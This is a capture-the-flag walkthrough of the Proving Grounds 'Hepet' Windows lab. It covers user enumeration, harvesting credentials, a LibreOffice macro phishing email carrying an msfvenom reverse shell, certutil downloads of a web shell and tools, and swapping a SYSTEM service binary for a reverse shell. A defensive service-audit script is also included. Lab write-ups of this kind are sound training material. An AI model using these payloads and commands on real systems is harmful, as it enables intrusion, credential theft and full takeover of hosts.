arsalandywriter.com

Proving Grounds Practice - Hepet Walkthrough Guide


Machine Name: Hepet
Machine Type: Windows
Difficulty: Intermediate
Machine IP: 192.168.244.140
Local Kali IP: 192.168.45.241

Enumeration

Nmap Results

autorecon 192.168.244.140

Port 79

~/Desktop/tools/finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.244.140 | grep -v 'is not known'

Port 8000

Found several usernames.

This confirms the data from finger on port 79. Add these to user.txt.

nano user.txt

admin
agnes
charlotte
jonas
magnus
martha
ela

Check the web content.

curl -s http://192.168.244.140:8000/ | html2markdown

This appears to be a password. Credentials: jonas:SicMundusCreatusEst

Port 143

Let's examine the emails.

nc 192.168.244.140 143

tag login jonas@localhost SicMundusCreatusEst
tag LIST "" "*"
tag SELECT INBOX
tag STATUS INBOX (MESSAGES)
tag fetch 1 (BODY[1])
tag fetch 2:5 BODY[HEADER] BODY[1]

We find that the mailadmin@localhost account is managing spreadsheets. The software used is likely LibreOffice, suggesting it will accept .ods or .xls files, presenting a potential vector for a macro attack.

Create a macro payload.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=4444 -f hta-psh -o evil.hta

Open the evil.hta file and split the payload.

nano splitter.py

# command string taken from evil.hta (<payload> is the encoded part)
s = "powershell.exe -nop -w hidden -e <payload>"
# chunk size in characters
n = 50

# print one string-concatenation line per chunk
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')

Create a new .ods file in LibreOffice Calc.

Enable auto-run once the spreadsheet is opened: Tools → Customize.

Send the file via email.

sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.244.140:25 -u 'a spreadsheet' -m 'Please check this spreadsheet' -a exploit.ods

nc -nvlp 4444

After a prolonged wait, someone eventually clicked on the file.

Privilege Escalation

Establish persistent access for future enumeration.

cd C:\xampp\htdocs
certutil -urlcache -split -f http://192.168.45.192/rev.exe
certutil -urlcache -split -f http://192.168.45.192/shell.pHp

Upload WinPEAS and execute.

certutil -urlcache -split -f http://192.168.45.192/wps.exe

Some relevant information is gathered.

This process looks suspicious!

It resides in the user's Veyon directory. Let's investigate further.

sc qc VeyonService

It operates with system privileges.
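From the defender's side, the condition found here (a service that starts as LocalSystem from a binary inside a user profile) can be audited from collected `sc qc` output. The following is an added example, not part of the original walkthrough: the sample output and the ExampleSvc entry are constructed, and the list of user-writable prefixes is an assumption.

```python
import re

# Constructed sample of `sc qc` output (not captured from the target);
# the first binary path follows the location named in the walkthrough.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeyonService
        BINARY_PATH_NAME   : C:\Users\Ela Arwel\Veyon\veyon-service.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
        SERVICE_START_NAME : LocalSystem
"""

# Locations commonly writable by non-admin users (assumed list, adjust per host).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")
PRIVILEGED_ACCOUNTS = {"localsystem", "nt authority\\system"}

def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one dict per service."""
    services = []
    for key, value in re.findall(r"^\s*([A-Z_]+)\s*:[ \t]*(.*)$", text, re.M):
        if key == "SERVICE_NAME":
            services.append({})
        if services:
            services[-1][key] = value.strip()
    return services

def image_path(binary_path_name):
    """Extract the executable path, dropping quotes and arguments."""
    if binary_path_name.startswith('"'):
        return binary_path_name[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)\b", binary_path_name, re.IGNORECASE)
    return m.group(1) if m else binary_path_name

def risky_services(text):
    """Privileged services whose image sits under a user-writable prefix."""
    flagged = []
    for svc in parse_sc_qc(text):
        account = svc.get("SERVICE_START_NAME", "").lower()
        path = image_path(svc.get("BINARY_PATH_NAME", ""))
        if account in PRIVILEGED_ACCOUNTS and path.lower().startswith(USER_WRITABLE_PREFIXES):
            flagged.append((svc["SERVICE_NAME"], path))
    return flagged

if __name__ == "__main__":
    for name, path in risky_services(SAMPLE_SC_QC):
        print(f"review ACLs: {name} -> {path}")
```

A flagged path is only a candidate: confirm the actual permissions on the file and its directory with icacls, then move the binary to a protected location or tighten the ACL.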

Let's substitute the file in this directory with a reverse shell: C:\Users\Ela Arwel\Veyon\veyon-service.exe.

# on kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.192 LPORT=5555 -f exe -o veyon-service.exe
nc -nvlp 5555

# on victim Windows
cd C:\Users\Ela Arwel\Veyon
move veyon-service.exe veyon-service.bak
certutil -f -urlcache http://192.168.45.192:80/veyon-service.exe veyon-service.exe
shutdown /r

We have now gained admin access! Mission Accomplished!
